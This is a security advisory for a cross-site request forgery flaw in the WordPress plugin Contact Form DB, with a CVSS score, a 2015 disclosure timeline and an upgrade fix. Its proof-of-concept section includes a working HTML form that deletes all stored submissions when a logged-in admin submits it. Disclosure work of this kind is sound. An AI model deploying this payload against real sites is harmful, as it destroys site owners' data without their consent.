CSRF in Contact Form DB allows attacker to delete all stored form submissions


Last revised:

An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 4.3 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript).

<form action="http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions" method="post">
  <input name="all" type="text" value="y">
  <input name="delete" type="text" value="y">
  <input type="submit">

Advisory timeline

  • 2015-02-05: Discovered
  • 2015-02-17: Reported to vendor by email
  • 2015-02-22: Vendor responded and agreed a schedule for fix
  • 2015-02-23: Vendor published a fix in version 2.8.32
  • 2015-03-04: Advisory published

Mitigation/further actions

Upgrade to version 2.8.32 or later